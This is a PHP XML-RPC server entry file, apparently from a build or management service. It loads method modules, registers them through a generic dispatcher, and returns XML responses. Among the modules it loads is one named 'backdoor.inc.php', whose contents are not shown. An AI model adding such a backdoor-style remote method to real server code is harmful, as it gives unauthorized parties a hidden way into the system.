<?php

//////////
///
///   server.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

require_once('methods/auth.inc.php');
require_once('methods/activity.inc.php');
require_once('methods/build.inc.php');
require_once('methods/backdoor.inc.php');
require_once('methods/config.inc.php');
require_once('methods/upload.inc.php');
require_once('methods/download.inc.php');
require_once('methods/log.inc.php');



/***************\
*   FUNCTIONS   *
\***************/

function methodhandler($method, $params)
{
   error_log($method.'(begin): mem='.memory_get_peak_usage());
   $ret = call_user_func_array($GLOBALS['dm'][$method]['function'], $params);
   error_log($method.'(end): mem='.memory_get_peak_usage());

   return $ret;
}


/**********\
*   MAIN   *
\**********/

$output_opt = array('encoding'  => 'UTF-8',
                    'verbosity' => 'no_white_space',
                    'escaping'  => 'markup');

$s = xmlrpc_server_create();

foreach(array_keys($dm) as $m) {
   xmlrpc_server_register_method($s, $m, 'methodhandler');
}

$r = xmlrpc_server_call_method($s, $HTTP_RAW_POST_DATA, false, $output_opt);
xmlrpc_server_destroy($s);

if(isset($_SERVER['HTTP_USER_AGENT']) && ($_SERVER['HTTP_USER_AGENT'] == 'XMLRPC++ 0.7')) {
   $r = preg_replace('{<([[:alpha:]]+)/>}', '<$1></$1>', $r);
}

header('Content-Length: '.strlen($r));
header('Content-Type: text/xml; charset=UTF-8');

echo $r;

?>
